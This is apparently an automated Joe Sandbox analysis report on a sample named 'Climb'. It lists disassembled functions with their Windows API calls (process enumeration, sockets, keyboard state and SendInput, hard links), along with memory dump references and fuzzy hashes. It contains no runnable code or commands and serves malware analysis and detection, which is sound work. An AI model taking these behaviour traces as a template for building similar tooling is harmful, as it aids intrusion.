Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: BDA14971E003C69FDB21DF2AC8917AEBBE5EF55314F1441ADE695AB282C3389941C750

Function 00110D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00150BD4,?), ref: 00110EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00150BD4,?), ref: 00110EF8
CLSIDFromProgID.OLE32(?,?,00000000,0014DCE0,000000FF,?,00000000,00000800,00000000,?,00150BD4,?), ref: 00110F1D
_memcmp.LIBVCRUNTIME ref: 00110F3E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 409e2e7ece5ebb5226e37f6ff46a0e545d86b858f620ada2be0dacf79f6fb21f
Instruction ID: d148cd4e24fae647b09f458f29d87a58bd1fd0e7a5974aba8b5c754c3eec616c
Opcode Fuzzy Hash: 409e2e7ece5ebb5226e37f6ff46a0e545d86b858f620ada2be0dacf79f6fb21f
Instruction Fuzzy Hash: A9811B75A00109EFCB05DF94C984EEEB7B9FF89315F204568F506AB250DB71AE86CB60

Function 0013B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0013B10C
Process32FirstW.KERNEL32(00000000,?), ref: 0013B11A

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

Process32NextW.KERNEL32(00000000,?), ref: 0013B1FC
CloseHandle.KERNEL32(00000000), ref: 0013B20B

Part of subcall function 000CE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,000F4D73,?), ref: 000CE395

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 5f3c31a078dd975a07ecb3ae6fc1edf2238c433f456df46c56e57fa7f575429b
Instruction ID: 2c0394d2fe597ea7780b63048b1486ce5279b14abd6a92ea5fc825b3c705b16d
Opcode Fuzzy Hash: 5f3c31a078dd975a07ecb3ae6fc1edf2238c433f456df46c56e57fa7f575429b
Instruction Fuzzy Hash: C1513B71608301AFD710EF24D886E9BBBE8FF89754F40491DF59997262EB70E904CB92

Function 000F1711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 000F1840

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 411ad1113060ace36ecbcc7fb0666e6d0b793e7f4cfa9524981d9de94b48402f
Instruction ID: 37b5a00213a9a302a6aa4b8fee50929257de00db43a96a242e3a6742ec1b9cd2
Opcode Fuzzy Hash: 411ad1113060ace36ecbcc7fb0666e6d0b793e7f4cfa9524981d9de94b48402f
Instruction Fuzzy Hash: 6C415C31604249EFDB207BBA9C41AFE36F4EF45770F144226F618D6A93DA35884262A1

Function 00132533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 0013255A
WSAGetLastError.WSOCK32 ref: 00132568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001325E7
WSAGetLastError.WSOCK32 ref: 001325F1

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: bc7a244547b8ea9239de905c0c44ca558b231a1c3c8de580ffab74236d92b153
Instruction ID: 5b984fe67287f5225697f6ef4eb2242cc4a65bc91e5b3c2383e88b77ce67ab75
Opcode Fuzzy Hash: bc7a244547b8ea9239de905c0c44ca558b231a1c3c8de580ffab74236d92b153
Instruction Fuzzy Hash: 0A419E74A00200AFE720AF24C886FAA77A5AF45758F54C45CF91A9F6D3D772ED42CB90

Function 00146CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00DEFC08,?), ref: 00146D1A
ScreenToClient.USER32(?,?), ref: 00146D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00146DBA

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 8e4450d3798a7379711a03a0f6f034f9499164167e45dc126e248e57cb0f9f3d
Instruction ID: 493610a0f96d7acc7f1b170a55fc52a0e08c1e7e334af4497ebf6827ade87f01
Opcode Fuzzy Hash: 8e4450d3798a7379711a03a0f6f034f9499164167e45dc126e248e57cb0f9f3d
Instruction Fuzzy Hash: 31512E74A00209EFCF25DFA4D8809AE7BB6FF55328F108559F955AB2A0D730AE81CB51

Function 000EB79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 751a40015c95d10ae6faf7d3de5a6ec5cae8fc6982ebc6d25d9fa3a6ff2ab8a0
Instruction ID: c219a2ea26cecd062fe497d65bb986b3f68477dc13201db90200d76b05660089
Opcode Fuzzy Hash: 751a40015c95d10ae6faf7d3de5a6ec5cae8fc6982ebc6d25d9fa3a6ff2ab8a0
Instruction Fuzzy Hash: BB410471A00744AFE724AF79CD41BABBBEDEB88710F10853AF151EB792DB7199018790

Function 0012611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001261C8
GetLastError.KERNEL32(?,00000000), ref: 001261EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00126213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0012623F

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 33826aaef120ef5be91b9a832f63335568df654b344c42d315a426107158bb64
Instruction ID: 1b2e452942878603b54697264a40a7f24b63314998dc49dbac77b484ce496020
Opcode Fuzzy Hash: 33826aaef120ef5be91b9a832f63335568df654b344c42d315a426107158bb64
Instruction Fuzzy Hash: 91414C39600610DFCB15EF14D545A9EBBE6EF89710B19C488E85AAB3A2CB30FD41CF91

Function 0011B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0011B473
SetKeyboardState.USER32(00000080), ref: 0011B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0011B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0011B54F

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: c597bac814f0964a031a577a1670e4d98357f85ff5da11d50852b5e572b17d9c
Instruction ID: 328621691ea0f560db34ca852192f3b44c7008ffb2add8f6018c02ba16fe5405
Opcode Fuzzy Hash: c597bac814f0964a031a577a1670e4d98357f85ff5da11d50852b5e572b17d9c
Instruction Fuzzy Hash: B8314B70A482186EFF3CCB28D8857FA7BB6AF59314F04823AF496965D2C37489C58751

Function 0011B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 0011B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 0011B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 0011B63B
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 0011B68D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: bc6224bd4954550f44c8912bd5a2b4206fd9479714660558c9ea7c0b5fbc9bbe
Instruction ID: cb24784f02723e8af65778e66fc89f8c211908b94f8c249f19a9eeb842ae28ce
Opcode Fuzzy Hash: bc6224bd4954550f44c8912bd5a2b4206fd9479714660558c9ea7c0b5fbc9bbe
Instruction Fuzzy Hash: DD313C30A486086EFF3C8B648C857FE7BB6AFA5310F04423AE485961E1D7748AC5CB91

Function 001480AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 001480D4
GetWindowRect.USER32(?,?), ref: 0014814A
PtInRect.USER32(?,?,?), ref: 0014815A
MessageBeep.USER32(00000000), ref: 001481C6

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 75b4a4d4884386b6cc36c31fdc563eb4c8ab6230ccb74179d8ea2251701bb2a2
Instruction ID: f56d4e0fe3f70ab33ce0b57bff3c6d1cbe6ad9c30dd11ca99b720ce80c83156b
Opcode Fuzzy Hash: 75b4a4d4884386b6cc36c31fdc563eb4c8ab6230ccb74179d8ea2251701bb2a2
Instruction Fuzzy Hash: 3541BE34A00215DFCB16CF58C884AADBBF5FF49B14F1441AAE9549B2B1CB30E982CF90

Function 00142176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00142187

Part of subcall function 00114393: GetWindowThreadProcessId.USER32(?,00000000), ref: 001143AD
Part of subcall function 00114393: GetCurrentThreadId.KERNEL32 ref: 001143B4
Part of subcall function 00114393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00112F00), ref: 001143BB

GetCaretPos.USER32(?), ref: 0014219B
ClientToScreen.USER32(00000000,?), ref: 001421E8
GetForegroundWindow.USER32 ref: 001421EE

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 864416a035f0b5153344fffc66fc6d4b1972bbc6d2f65d884850b1de6df38cb2
Instruction ID: 273ef563af13645659ac51b7071c92832746bc4a8ba67d7634b0f33c6f474908
Opcode Fuzzy Hash: 864416a035f0b5153344fffc66fc6d4b1972bbc6d2f65d884850b1de6df38cb2
Instruction Fuzzy Hash: 02313275D00109AFDB04DFA5C881DEEB7FCEF58304B54846AE415E7212EB719E45CBA0

Function 0011E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 000B41EA: _wcslen.LIBCMT ref: 000B41EF

_wcslen.LIBCMT ref: 0011E8E2
_wcslen.LIBCMT ref: 0011E8F9
_wcslen.LIBCMT ref: 0011E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0011E92F

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: e84153980d9c54f37239fd15345ec01ecce8f8720bcb7c18692f924c0d677e74
Instruction ID: c71e80bd5ec6c63100c092b801ac308e44fc8f0ff7c4ac5761b47a90f9c6e203
Opcode Fuzzy Hash: e84153980d9c54f37239fd15345ec01ecce8f8720bcb7c18692f924c0d677e74
Instruction Fuzzy Hash: D321A175D00318AFCB15AFA8D982BEEB7F8EF45750F144066E804AB342D7709E818BB1

Function 00149A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0

GetCursorPos.USER32(?), ref: 00149A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00149A72
GetCursorPos.USER32(?), ref: 00149ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00149AF0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 570bcb2af3763a3b80973027afdd509a7765e0723c3cf0675f0c0edee0339b40
Instruction ID: c0ce4eec0ff57c30a8aa40531616ff51aa8d33fe79d635ab4f128da495e85546
Opcode Fuzzy Hash: 570bcb2af3763a3b80973027afdd509a7765e0723c3cf0675f0c0edee0339b40
Instruction Fuzzy Hash: 2721BC34600018AFCF268F94D888EEF7BBAFB0A320F604265F9058B1B1D7309991DB60

Function 0011DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0014DC30), ref: 0011DBA6
GetLastError.KERNEL32 ref: 0011DBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 0011DBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0014DC30), ref: 0011DC21

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: a08c51347ef2e7cabeea4ddc079afb05d8b7dd02a3f128ac4376d30891df7f30
Instruction ID: 991c94711391528acc6385374293574cbf2a12274e284e09d3e084bc2532d754
Opcode Fuzzy Hash: a08c51347ef2e7cabeea4ddc079afb05d8b7dd02a3f128ac4376d30891df7f30
Instruction Fuzzy Hash: 2821B7706087019F8704DF24E8809DB77E8EF56364F100A2DF499C32A2DB71D986CB82

Function 0014321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 001432A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 001432C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 001432CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001432DC

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: f005f838a957ccf9771774a6f6284bb94524ddae18ea5245e5ad9948f687c351
Instruction ID: 1e9115fbe51c286d4c494f2b03deb4890c631ae1da30b798e10673cb77233c0b
Opcode Fuzzy Hash: f005f838a957ccf9771774a6f6284bb94524ddae18ea5245e5ad9948f687c351
Instruction Fuzzy Hash: DD21D331304111AFE7149B24C855FAABB95EF82324F248258F8368B6E2C7B1ED81CBD0

Function 0011825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 001196E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00118271,?,000000FF,?,001190BB,00000000,?,0000001C,?,?), ref: 001196F3
Part of subcall function 001196E4: lstrcpyW.KERNEL32(00000000,?,?,00118271,?,000000FF,?,001190BB,00000000,?,0000001C,?,?,00000000), ref: 00119719
Part of subcall function 001196E4: lstrcmpiW.KERNEL32(00000000,?,00118271,?,000000FF,?,001190BB,00000000,?,0000001C,?,?), ref: 0011974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001190BB,00000000,?,0000001C,?,?,00000000), ref: 0011828A
lstrcpyW.KERNEL32(00000000,?,?,001190BB,00000000,?,0000001C,?,?,00000000), ref: 001182B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,001190BB,00000000,?,0000001C,?,?,00000000), ref: 001182EB

Strings

cdecl, xrefs: 001182E2

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: e8514a69bbca6773e638dff59ac8bb050447b25177ad17917a47fecd8fb6597a
Instruction ID: 27009af96768a6446036a8ad3afdd9b32ce9fb316270820bd484e16b1977b567
Opcode Fuzzy Hash: e8514a69bbca6773e638dff59ac8bb050447b25177ad17917a47fecd8fb6597a
Instruction Fuzzy Hash: 4511E93A200351ABCB199F34D845EBA77A9FF45B50B50803AF946C72A0EF31D891D761

Function 001460FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 0014615A
_wcslen.LIBCMT ref: 0014616C
_wcslen.LIBCMT ref: 00146177
SendMessageW.USER32(?,00001002,00000000,?), ref: 001462B5

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 524966f8611ab2709d6a99a7a453db45b54ae5007a0881ca5a9e757518c57a87
Instruction ID: 4101ee178198675e0c338d2c7ae114e6e84483978bb1310c234ad3cc26c3c87a
Opcode Fuzzy Hash: 524966f8611ab2709d6a99a7a453db45b54ae5007a0881ca5a9e757518c57a87
Instruction Fuzzy Hash: 1511D375500208A7DF10DF649C84EEF77BCEB52758B10402BFA15D61A3E770C944CB62

Function 000E2079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e7b18f0d3a0fcedf631b5f849dd0936bb785acc8fa0023f58467295b6cc0b8c
